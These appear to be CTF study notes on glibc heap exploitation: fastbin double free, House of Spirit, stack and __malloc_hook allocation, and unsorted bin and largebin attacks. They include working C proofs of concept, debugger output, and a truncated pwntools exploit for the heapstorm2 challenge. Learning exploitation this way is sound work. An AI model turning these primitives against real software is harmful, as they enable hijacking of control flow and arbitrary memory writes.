edit(1, pack(system_addr))
delete(2)

# gdb.attach(p)
itt()


if __name__ == '__main__':
main()

Chunk Extend and Overlapping

  1. chunk extend means manipulating the size and prev_size fields to operate across chunk boundaries, producing overlapping chunks.
  2. With extend we get chunk overlapping, and overlapping gives control of a chunk's fd/bk pointers, enabling fastbin attack and similar techniques. A sketch follows.

The example challenge is again heapstorm2.
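A minimal chunk-extend sketch (my own demo for a tcache glibc; the heap overflow is modeled by a direct write to a's size field, and the sizes are kept small for clarity):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char *a = malloc(0x18);                  /* chunk size 0x20 */
    char *b = malloc(0x88);                  /* chunk size 0x90, directly after a */
    malloc(0x18);                            /* guard against consolidation with top */

    *(size_t *)(a - 8) = (0x20 + 0x90) | 1;  /* the "overflow": extend a's size over b */
    free(a);                                 /* a+b enter the 0xb0 tcache bin as one chunk */

    char *big = malloc(0xa8);                /* take the merged region back: big == a */
    memset(big + 0x20, 'X', 8);              /* this lands inside b's user data */
    printf("b now starts with: %.8s\n", b);  /* prints XXXXXXXX */
    return 0;
}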

Fastbin Attack

Almost all of this comes from CTF-Wiki, with some edits and a few personal notes added.

Introduction

fastbin attack is a family of exploitation techniques, covering everything built on the fastbin mechanism. The prerequisites are:

  • a vulnerability that can control chunk contents, such as a heap overflow or use-after-free
  • the vulnerability occurs in a fastbin-sized chunk

Subdividing further, the family contains:

  • Fastbin Double Free
  • House of Spirit
  • Alloc to Stack
  • Arbitrary Alloc

The first two focus on freeing a real or forged chunk and then re-allocating it; the latter two focus on corrupting the fd pointer directly so that malloc returns a chunk at a chosen location.

Fastbin Double Free

Introduction

Fastbin Double Free means a fastbin chunk can be freed multiple times and therefore appear multiple times in the fastbin list. As a result, several allocations can return the same chunk — multiple pointers aliasing one block — which, combined with the block's contents, gives a type-confusion-like effect.

Fastbin Double Free succeeds for two reasons:

  1. freeing a fastbin chunk does not clear the prev_inuse bit of the next chunk;
  2. on free, the fastbin code only validates the chunk that main_arena points to directly, i.e. the head of the list, never the chunks behind it.
/* Another simple check: make sure the top of the bin is not the
record we are going to add (i.e., double free). */
if (__builtin_expect (old == p, 0))
{
errstr = "double free or corruption (fasttop)";
goto errout;
}

Example

#include <stdio.h>
#include <stdlib.h>

typedef struct _chunk
{
long long pre_size;
long long size;
long long fd;
long long bk;
} CHUNK,*PCHUNK;

CHUNK bss_chunk;

int main(void)
{
void *chunk1,*chunk2;
void *chunk_a,*chunk_b;

bss_chunk.size=0x21; /* a forged size so the fastbin size check passes later */
chunk1=malloc(0x10);
chunk2=malloc(0x10);

free(chunk1);
free(chunk2);
free(chunk1); /* double free: the fastbin now reads chunk1 -> chunk2 -> chunk1 */

chunk_a=malloc(0x10); /* returns chunk1 */
*(long long *)chunk_a=(long long)&bss_chunk; /* overwrite chunk1's fd with &bss_chunk */
malloc(0x10); /* returns chunk2 */
malloc(0x10); /* returns chunk1 again */
chunk_b=malloc(0x10); /* returns the fake chunk: user pointer = &bss_chunk.fd */
printf("%p\n",chunk_b);
return 0;
}

House Of Spirit

Introduction

House of Spirit is one of the techniques from the Malloc Maleficarum.

Its core: forge a fastbin chunk at the target location and free it, so that a later allocation returns a chunk at that chosen address.

For the fake fastbin chunk to land in the corresponding fastbin when freed, several checks must be bypassed:

  • the fake chunk's IS_MMAPPED bit must not be 1, since mmapped chunks take a separate path in free;
  • the fake chunk's address must be aligned (MALLOC_ALIGN_MASK);
  • the fake chunk's size must fit the corresponding fastbin and also be aligned;
  • the fake chunk's next chunk must have a size larger than 2 * SIZE_SZ and smaller than av->system_mem;
  • the head of the corresponding fastbin must not already be the fake chunk, i.e. no double-free pattern.

Demonstration

The how2heap example, directly:

#include <stdio.h>
#include <stdlib.h>

int main()
{
fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
malloc(1);

fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
unsigned long long *a;
// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);

fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
fake_chunks[1] = 0x40; // this is the size

fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
fake_chunks[9] = 0x1234; // nextsize

fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
a = &fake_chunks[2];

fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);

fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

Running it gives:

➜  how2heap git:(master) ./house_of_spirit
This file demonstrates the house of spirit attack.
Calling malloc() once so that it sets up its memory.
We will now overwrite a pointer to point to a fake 'fastbin' region.
This region (memory of length: 80) contains two chunks. The first starts at 0x7ffd9bceaa58 and the second at 0x7ffd9bceaa88.
This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.
... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end.
The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.
Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, 0x7ffd9bceaa58.
... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffd9bceaa58, which will be 0x7ffd9bceaa60!
malloc(0x30): 0x7ffd9bceaa60

Summary

As you can see, allocating a chunk at a chosen address this way does not require modifying anything at the address itself; the key is controlling the memory just before and after so the checks pass. Other ways to bypass them? For now I only know the method above — to be extended.

Alloc to Stack

Introduction

Fastbin Double Free, House of Spirit and this section's Alloc to Stack all rest on the same fastbin property: a chunk's fd points to the next chunk on the list.

The core of the technique is hijacking the fd of a chunk in the fastbin list to point at a chosen spot on the stack, thereby controlling key stack data such as return addresses.

Demonstration

This time we place the fake chunk on the stack and call it stack_chunk; hijacking the fd of a fastbin chunk to point at stack_chunk makes malloc return a fastbin chunk inside the stack.

#include <stdlib.h>

typedef struct _chunk
{
long long pre_size;
long long size;
long long fd;
long long bk;
} CHUNK,*PCHUNK;

int main(void)
{
CHUNK stack_chunk;

void *chunk1;
void *chunk_a;

stack_chunk.size=0x21;
chunk1=malloc(0x10); /* 0x10 is the user-data size; chunk1 points at what becomes fd once freed */

free(chunk1); /* chunk1 is now the only chunk in its fastbin, its fd is NULL */

*(long long *)chunk1=(long long)&stack_chunk; /* write an 8-byte fd pointing at stack_chunk */
malloc(0x10); /* takes chunk1 back out */
chunk_a=malloc(0x10); /* returns the fake chunk (stack_chunk): we can now modify stack data */
return 0;
}

In gdb we can see that chunk1's fd now points at stack_chunk:

0x602000:   0x0000000000000000  0x0000000000000021 <=== chunk1
0x602010: 0x00007fffffffde60 0x0000000000000000
0x602020: 0x0000000000000000 0x0000000000020fe1 <=== top chunk

After the first malloc, the fastbin list points at stack_chunk, meaning the next allocation is served from stack_chunk's memory:

0x7ffff7dd1b20 <main_arena>:    0x0000000000000000 <=== unsorted bin
0x7ffff7dd1b28 <main_arena+8>: 0x00007fffffffde60 <=== fastbin[0]
0x7ffff7dd1b30 <main_arena+16>: 0x0000000000000000

The second malloc indeed returns 0x00007fffffffde70, i.e. stack_chunk:

   0x400629 <main+83>        call   0x4004c0 <malloc@plt>
→ 0x40062e <main+88> mov QWORD PTR [rbp-0x38], rax
$rax : 0x00007fffffffde70

0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /home/Ox9A82/tst/tst
0x0000000000600000 0x0000000000601000 0x0000000000000000 r-- /home/Ox9A82/tst/tst
0x0000000000601000 0x0000000000602000 0x0000000000001000 rw- /home/Ox9A82/tst/tst
0x0000000000602000 0x0000000000623000 0x0000000000000000 rw- [heap]
0x00007ffff7a0d000 0x00007ffff7bcd000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7bcd000 0x00007ffff7dcd000 0x00000000001c0000 --- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dcd000 0x00007ffff7dd1000 0x00000000001c0000 r-- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd1000 0x00007ffff7dd3000 0x00000000001c4000 rw- /lib/x86_64-linux-gnu/libc-2.23.so
0x00007ffff7dd3000 0x00007ffff7dd7000 0x0000000000000000 rw-
0x00007ffff7dd7000 0x00007ffff7dfd000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7fdb000 0x00007ffff7fde000 0x0000000000000000 rw-
0x00007ffff7ff6000 0x00007ffff7ff8000 0x0000000000000000 rw-
0x00007ffff7ff8000 0x00007ffff7ffa000 0x0000000000000000 r-- [vvar]
0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x [vdso]
0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000025000 r-- /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7ffd000 0x00007ffff7ffe000 0x0000000000026000 rw- /lib/x86_64-linux-gnu/ld-2.23.so
0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw-
0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack]
0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall]

Summary

With this technique we can place a fastbin chunk on the stack and thereby control return addresses and other key data. It requires hijacking the fd of a fastbin chunk toward the stack, and a valid size value must already exist at the target.

Arbitrary Alloc

Introduction

Arbitrary Alloc is exactly Alloc to Stack with a different target. As long as the target address carries a valid size field (forged or naturally occurring, either way), we can allocate a chunk into any writable memory: bss, heap, data, stack, and so on.

Demonstration

In this example we use byte misalignment to allocate a fastbin directly over __malloc_hook, effectively overwriting __malloc_hook to hijack control flow.

#include <stdlib.h>

int main(void)
{
void *chunk1;
void *chunk_a;

chunk1=malloc(0x60);

free(chunk1);

*(long long *)chunk1=0x7ffff7dd1af5-0x8; /* 0x7ffff7dd1af5 holds the misaligned 0x7f size byte;
fd points at a chunk header, so subtract 8 to make that byte land on the size field */
malloc(0x60); /* takes chunk1 back out */
chunk_a=malloc(0x60); /* writing through this pointer overwrites __malloc_hook */
return 0;
}

The value 0x7ffff7dd1af5 is from my own machine. How was it found? First, look near the address we want to write for byte-misalignment opportunities.

0x7ffff7dd1a88 0x0  0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1a90 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1a98 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1aa0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1aa8 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ab0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ab8 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ac0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ac8 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ad0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ad8 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ae0 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1ae8 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1af0 0x60 0x2 0xdd 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1af8 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0
0x7ffff7dd1b00 0x20 0x2e 0xa9 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1b08 0x0 0x2a 0xa9 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1b10 <__malloc_hook>: 0x30 0x28 0xa9 0xf7 0xff 0x7f 0x0 0x0

0x7ffff7dd1b10 is the __malloc_hook we want to control, so we search upward for a misaligned but valid size field. The binary is 64-bit, so fastbins cover 32 to 128 bytes (0x20-0x80):

//the sizes listed here are user-area sizes, i.e. 2*SIZE_SZ less than the chunk size
Fastbins[idx=0, size=0x10]
Fastbins[idx=1, size=0x20]
Fastbins[idx=2, size=0x30]
Fastbins[idx=3, size=0x40]
Fastbins[idx=4, size=0x50]
Fastbins[idx=5, size=0x60]
Fastbins[idx=6, size=0x70]

Observation shows that reading at 0x7ffff7dd1af5 misaligns into a plausible 0x000000000000007f:

0x7ffff7dd1af0 0x60 0x2 0xdd 0xf7 0xff 0x7f 0x0 0x0
0x7ffff7dd1af8 0x0 0x0 0x0 0x0 0x0 0x0 0x0 0x0

0x7ffff7dd1af5 <_IO_wide_data_0+309>: 0x000000000000007f

0x7f falls into fastbin index 5 when computing the index, i.e. chunk size 0x70:

#define fastbin_index(sz)                                                      \
((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)

(note that sz is an unsigned int, so only 4 bytes are considered)

Since that size includes the 0x10 chunk header, we allocate a 0x60 fastbin chunk and link it in. After two allocations the chunk lands at 0x7ffff7dd1afd, giving direct control over __malloc_hook's contents (in my libc, __realloc_hook sits right next to __malloc_hook).

0x4005a8 <main+66>        call   0x400450 <malloc@plt>
→ 0x4005ad <main+71> mov QWORD PTR [rbp-0x8], rax

$rax : 0x7ffff7dd1afd

0x7ffff7dd1aed <_IO_wide_data_0+301>: 0xfff7dd0260000000 0x000000000000007f
0x7ffff7dd1afd: 0xfff7a92e20000000 0xfff7a92a0000007f
0x7ffff7dd1b0d <__realloc_hook+5>: 0x000000000000007f 0x00 00000000000000
0x7ffff7dd1b1d: 0x0000000000000000 0x0000000000000000

Summary

Arbitrary Alloc is used even more often in CTF. With tricks like byte misalignment we can bypass the size check and allocate a chunk at an arbitrary address — in effect, an arbitrary-address, arbitrary-value write.

Details when a concrete challenge comes up.

unsortedbin attack

Overview

Unsorted Bin Attack, as the name suggests, is closely tied to how glibc's unsorted bin works.

Its prerequisite is control over the bk pointer of an unsorted bin chunk.

Its effect is overwriting an arbitrary address with a fairly large value.

How chunks reach the unsorted bin

  1. When a larger chunk is split in two, the remainder goes into the unsorted bin if it is larger than MINSIZE.
  2. Freeing a chunk that is not fastbin-sized and does not border the top chunk puts it into the unsorted bin first. See the discussion of the top chunk below.
  3. malloc_consolidate may put merged chunks into the unsorted bin, if they do not border the top chunk.

Unsorted Bin Leak

Leak principle

If we can leak an intact fd pointer, we obtain an address at a fixed offset from main_arena, and the offset can be found by debugging. main_arena is a global variable of type struct malloc_state, the single instance ptmalloc uses to manage the main arena. Being a global, it lives in sections like .data or .bss, so given the process's libc.so we can compute main_arena's offset from the libc base — bypassing ASLR.

How to get main_arena's offset from the libc base? Two approaches.

  1. From the __malloc_trim function.

malloc.c contains this code:

int
__malloc_trim (size_t s)
{
int result = 0;

if (__malloc_initialized < 0)
ptmalloc_init ();

mstate ar_ptr = &main_arena; //<=here!
do
{
__libc_lock_lock (ar_ptr->mutex);
result |= mtrim (ar_ptr, s);
__libc_lock_unlock (ar_ptr->mutex);

ar_ptr = ar_ptr->next;
}
while (ar_ptr != &main_arena);

return result;
}

Note the access mstate ar_ptr = &main_arena; — tools like IDA can recover the offset from it.

For example, load the .so into IDA and find malloc_trim to read off the offset.

  2. Directly from __malloc_hook.

Conveniently, main_arena lies exactly 0x10 bytes after __malloc_hook, and most libc builds export __malloc_hook, which saves a lot of work. With pwntools:

main_arena_offset = ELF("libc.so.6").symbols["__malloc_hook"] + 0x10

This yields main_arena's offset from the base address.

Achieving the leak

Generally the leak requires a UAF: put a chunk into the unsorted bin, then print its fd. Typical note-keeping challenges have a show function; showing the node at the tail of the list leaks the libc base (see the sketch below).

In particular, in CTF exploitation the heap is usually freshly initialized, so the unsorted bin is clean; when it holds a single chunk, both that chunk's fd and bk point into main_arena.

Also, if we cannot reach the list tail but can reach the head, then on 32-bit a printf over the head often prints fd and bk together, which leaks just as well.

On 64-bit, however, the high bytes of addresses are \x00, which truncates many output functions, so an effective leak can be hard.
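A sketch of the leak (my own demo; the request exceeds the 0x410 tcache cap so the freed chunk really lands in the unsorted bin):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    long *p = malloc(0x420);  /* chunk size 0x430, beyond tcache's largest bin */
    malloc(0x20);             /* guard: keep p from merging into the top chunk on free */
    free(p);                  /* p goes into the unsorted bin */
    /* fd and bk both point at the bin head inside main_arena: a libc leak */
    printf("fd = %p, bk = %p\n", (void *) p[0], (void *) p[1]);
    return 0;
}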

Unsorted Bin Attack principle

_int_malloc in glibc/malloc/malloc.c contains this code: when a chunk is taken out of the unsorted bin, the unsorted bin's address is written into bck->fd.

/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

In other words, if we control the bk value, we can write unsorted_chunks (av) to an arbitrary address.

Note!!! The check shown exists from version 2.28 on; parts of this article have been updated from 2.27 to 2.28, the rest still pending.

I'll use unsorted_bin_attack.c from shellphish's how2heap repository as the example, lightly modified:

#include <stdio.h>
#include <stdlib.h>

int main() {
fprintf(stderr, "This file demonstrates unsorted bin attack by write a large "
"unsigned long value into stack\n");
fprintf(
stderr,
"In practice, unsorted bin attack is generally prepared for further "
"attacks, such as rewriting the "
"global variable global_max_fast in libc for further fastbin attack\n\n");

unsigned long target_var = 0;
fprintf(stderr,
"Let's first look at the target we want to rewrite on stack:\n");
fprintf(stderr, "%p: %ld\n\n", &target_var, target_var);

unsigned long *p = malloc(400);
fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",
p);
fprintf(stderr, "And allocate another normal chunk in order to avoid "
"consolidating the top chunk with"
"the first one during the free()\n\n");
malloc(500);

free(p);
fprintf(stderr, "We free the first chunk now and it will be inserted in the "
"unsorted bin with its bk pointer "
"point to %p\n",
(void *)p[1]);

/*------------VULNERABILITY-----------*/
p[1] = (unsigned long)(&target_var - 2);
fprintf(stderr, "Now emulating a vulnerability that can overwrite the "
"victim->bk pointer\n");
fprintf(stderr, "And we write it with the target address-16 (in 32-bits "
"machine, it should be target address-8):%p\n\n",
(void *)p[1]);

//------------------------------------

malloc(400);
fprintf(stderr, "Let's malloc again to get the chunk we just free. During "
"this time, target should has already been "
"rewrite:\n");
fprintf(stderr, "%p: %p\n", &target_var, (void *)target_var);
}

Running the program gives:

➜  unsorted_bin_attack git:(master) ✗ gcc unsorted_bin_attack.c -o unsorted_bin_attack
➜ unsorted_bin_attack git:(master) ✗ ./unsorted_bin_attack
This file demonstrates unsorted bin attack by write a large unsigned long value into stack
In practice, unsorted bin attack is generally prepared for further attacks, such as *rewriting the global variable global_max_fast* in libc for further fastbin attack

Let's first look at the target we want to rewrite on stack:
0x7ffe0d232518: 0

Now, we allocate first normal chunk on the heap at: 0x1fce010
And allocate another normal chunk in order to avoid consolidating the top chunk withthe first one during the free()

We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer point to 0x7f1c705ffb78
Now emulating a vulnerability that can overwrite the victim->bk pointer
And we write it with the target address-16 (in 32-bits machine, it should be target address-8):0x7ffe0d232508

Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:
0x7ffe0d232518: 0x7f1c705ffb78

A diagram describes the flow and the mechanism behind it:

[figure: unsorted bin attack workflow]

Initial state

The unsorted bin's fd and bk both point at the unsorted bin itself.

After free(p)

The freed chunk's size is not in fastbin range, so it goes into the unsorted bin first.

After modifying p[1]

p's bk now points at the fake chunk forged at target addr-16, so Target Value sits at the fake chunk's fd.

After malloc(400)

The requested size is in smallbin range and the corresponding bin is momentarily empty, so the search falls through to the unsorted bin, finds it non-empty, and takes out its last chunk:

while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) {
bck = victim->bk;
if (__builtin_expect(chunksize_nomask(victim) <= 2 * SIZE_SZ, 0) ||
__builtin_expect(chunksize_nomask(victim) > av->system_mem, 0))
malloc_printerr(check_action, "malloc(): memory corruption",
chunk2mem(victim), av);
size = chunksize(victim);

/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/
/* clearly, bck has been tampered with and does not satisfy this condition */
if (in_smallbin_range(nb) && bck == unsorted_chunks(av) &&
victim == av->last_remainder &&
(unsigned long) (size) > (unsigned long) (nb + MINSIZE)) {
....
}

/* remove from unsorted list */
unsorted_chunks(av)->bk = bck;
bck->fd = unsorted_chunks(av);
  • victim = unsorted_chunks(av)->bk=p
  • bck = victim->bk=p->bk = target addr-16
  • unsorted_chunks(av)->bk = bck=target addr-16
  • bck->fd = *(target addr -16+16) = unsorted_chunks(av);

As you can see, taking the last chunk out of the unsorted bin never uses victim's fd, so setting it to an illegal value does no harm. Note, however, that the unsorted bin list may be corrupted by this, and inserting chunks later can fail.

The value at target is overwritten with the unsorted bin's list head 0x7f1c705ffb78 — the address printed earlier:

We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer point to 0x7f1c705ffb78
Now emulating a vulnerability that can overwrite the victim->bk pointer
And we write it with the target address-16 (in 32-bits machine, it should be target address-8):0x7ffe0d232508

Let's malloc again to get the chunk we just free. During this time, target should has already been rewrite:
0x7ffe0d232518: 0x7f1c705ffb78

So an unsorted bin attack can indeed modify an arbitrary address, but the written value is not under our control; all we know is that it is large. Note also that it no longer works from version 2.28 on.

With this primitive you can:

  • enlarge a loop counter so the program runs more iterations;
  • overwrite global_max_fast in libc so that larger chunks count as fastbins, enabling further fastbin attacks.

largebin attack

Wiki

On debugging with a specific libc:
  1. Patch the ELF to use the chosen libc: ./chlibc ctest 2.27
#!/bin/bash
if [ $# -ne 2 ]; then
echo Need two arguments!
exit 128
fi
version=$2
binary=$1
libc_path=`find /glibs -type d -regex "/glibs/$version.*amd64"`
#echo $libc_path
#exit

patchelf --set-interpreter "$libc_path/ld-linux-x86-64.so.2" $binary
patchelf --set-rpath $libc_path $binary

echo ldd output:
ldd $binary
  2. Open it in gdb directly and use list to see which source file is needed; setting dir /glibs/glibc-2.27/stdio-common/ is usually enough.

GDB Source-path Doc or make glibc from src

  • Where it comes from: when the unsorted-bin loop inserts a chunk into a large bin, list integrity is not checked.
    The exploited writes are bck->fd = victim and fwd->bk_nextsize->fd_nextsize = victim, where fwd is the first chunk, scanning left to right, smaller than nb, and bck is the chunk to its left.
  • Effect: write the address of a chunk (at least the third one onward) to arbitrary locations; offsetting by a few bytes plants the address's top bytes into a size field.
  • Prerequisites:
    • UAF, or the whole-chunk write that chunk overlapping provides;
    • the ability to malloc large-bin sizes;
    • control over the entire chunk, including the size field in the header.
  • Process (see the sketch after this list):
    1. malloc three chunks: one smallbin-sized and two large-bin-sized, with a malloc(0x20) after each to prevent consolidation; chunk size 0x3f0 is the dividing line.
    2. free 1 and 2; both land in the unsorted bin.
    3. Then malloc(0x90): 2 moves into the large bin; 1 is taken out, split, and the remainder returns to the unsorted bin.
    4. free 3; it joins the unsorted bin, alongside the remainder of 1.
    5. Corrupt 2 (UAF): shrink its size below 3's, clear IS_MMAPPED, and point bk and bk_nextsize at the target addresses.
    6. malloc(0x90): the remainder of 1 is split again, 3 is inserted into the large bin, and the two addresses planted in 2, plus offsets (the addresses are treated as chunks), get overwritten with 3's address.
    7. Done.
  • Notes:
    • add small chunks to prevent consolidation;
    • there are two variants, depending on whether the incoming large chunk is bigger or smaller than the current smallest chunk in the bin; the walkthrough above uses the bigger case.
  • Version changes:
    • 2.30 adds a skip-list check for the large bin — when the chunk is bigger than the bin's smallest, it errors out if fwd's bk->fd is not fwd itself.
      Only the smaller-than variant remains usable.
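A condensed sketch of the bigger-than variant, modeled on how2heap's large_bin_attack demo (pre-2.30 only; the UAF is modeled by direct writes, and the offsets follow that demo):

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    unsigned long stack_var1 = 0, stack_var2 = 0;

    unsigned long *p1 = malloc(0x320);  /* gets split; its remainder feeds later requests */
    malloc(0x20);                       /* guards prevent consolidation */
    unsigned long *p2 = malloc(0x400);  /* will sit in the large bin, then be corrupted */
    malloc(0x20);
    unsigned long *p3 = malloc(0x400);  /* its chunk address is what gets written out */
    malloc(0x20);

    free(p1);
    free(p2);
    malloc(0x90);   /* sorts p2 into the large bin and splits p1 */
    free(p3);       /* p3 joins the unsorted bin */

    /* the "UAF": shrink p2's size and aim bk / bk_nextsize at the two targets */
    p2[-1] = 0x3f1;                              /* smaller than p3, so p3 sorts after it */
    p2[0]  = 0;
    p2[2]  = 0;
    p2[1]  = (unsigned long) (&stack_var1 - 2);  /* fake bk          */
    p2[3]  = (unsigned long) (&stack_var2 - 4);  /* fake bk_nextsize */

    malloc(0x90);   /* inserting p3 into the large bin performs both writes */
    printf("%#lx %#lx\n", stack_var1, stack_var2);  /* both now hold p3's chunk address */
    return 0;
}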

heapstorm2

A menu challenge, for practice. How did it get this weird... source file link

All protections enabled, symbols completely stripped — renamed the functions one by one, and patched alarm's timeout.

  • It starts with mallopt(M_MXFAST, 0) (see malloc.h), which disables fastbins by setting the fastbin size cap to 0.
  • It mmaps one page at 0x13370000 and writes 0x18 bytes (3 qwords) of random data at 0x13370800; 0x13370818 is then set to the third qword, ending at 0x0820.
    From 0x0820 on, 16 consecutive 0x10-byte slots are initialized with the first and second qwords.
0x13370800:     a1      a2
0x13370810: a3 a3
//the per-row t values are not necessarily equal.
  • alloc:
    • scan the t2 slots above for one equal to a2 (an empty slot).
    • size constraint: v2 > 12 && v2 <= 4096.
    • after calloc (note: it zeroes the contents), set t1 = a1 ^ calloc_addr, t2 = a2 ^ size.
  • update:
    • idx must be 0-15 and a2 != t2.
    • size < (a2 ^ t2 - 12). addr = a1 ^ t1
    • write size bytes to addr, immediately followed by a strcpy of the "HEAPSTORM_II" string, 12 characters long.
  • delete:
    • xor-decode the chunk address from t1 and free it.
    • reset t1 and t2.
  • view:
    • the two a3 slots must have been changed to a4, a5 satisfying a4 ^ a5 == 0x13377331.
    • decode address and length from t1 and t2, write the contents to stdout.

The crucial bug: update reads len-12 bytes, but the "HEAPSTORM_II" string carries a terminating NUL that strcpy copies too — a NULL-byte off-by-one.

This NULL overflow can only zero out the lowest byte of the adjacent size field, i.e. shrink chunk0's size.

With the size shrunk and prev_inuse also cleared, freeing chunk1 consolidates backward over a chunk smaller than reality (the fake chunk0's size must of course match prev_size); fd and bk (and possibly fd_nextsize/bk_nextsize) then get written inside chunk0's area — note the last 12 bytes are unusable — so we can read or modify them, or rewrite chunk1's header after re-mallocing.

This challenge really exceeded my expectations; the complexity is something else. I studied someone's reposted, heavily truncated exploit for half a day before fully understanding it, only to find a reference link at the end — they couldn't even copy the whole thing.

Original: link

Things learned, listed out:

  • The two chunk-shrink operations at the start: the off-by-null shrinks a chunk's size to carve out a gap for chunk overlap, letting 7 control 2 and 8 control 4.
  • At line 84 the bins hold two chunks: 4 in the large bin and 2 in the unsorted bin. The standard large_bin_attack would use a third chunk to push the unsorted one into the large bin and get the arbitrary chunk-pointer write; here the target chunk's size is made 56 (by retrying ASLR until it reads 56). But since 2 was rewritten, the chunk left of 2 is 0x133707e0, and the one left of that has no pointers set, so the big unsorted-bin loop would eventually crash. However, the loop returns immediately on an exact fit, so a simple alloc(0x48) allocates a chunk at the chosen location. Note also that unsorted-bin removal walks right to left and sets the header's bk to victim's bk, which is why the earlier largebin attack set not only the size field but also the bk pointer to a real chunk, avoiding a segfault.
  • So largebin attack combined with the unsorted-bin loop also achieves allocation at a chosen location.
  • That completes full arbitrary read/write: read a heap pointer, locate some large-bin chunk's fd_nextsize to find the libc base, and overwrite __free_hook (because of RELRO).

It really confirms the saying: largebin attack is only one link in the chain, and other techniques must be combined for a full exploit. This one challenge chained off-by-null + chunk overlapping + largebin attack + the unsorted-bin loop.

from pwn import *
import pwnlib

context.binary = './heapstorm2'
context.log_level = 'debug'
sl=lambda x:p.sendline(x)
p = None
elf = ELF('/glibs/2.24-3ubuntu1_amd64/libc-2.24.so')

def g():
pwnlib.gdb.attach(p)
raw_input()

def add(size):
p.recvuntil('Command: ')
sl("1")
p.recvuntil('Size: ')
sl(str(size))

def edit(index,size,content):
p.recvuntil('Command: ',timeout=1)
sl("2")
p.recvuntil('Index: ')
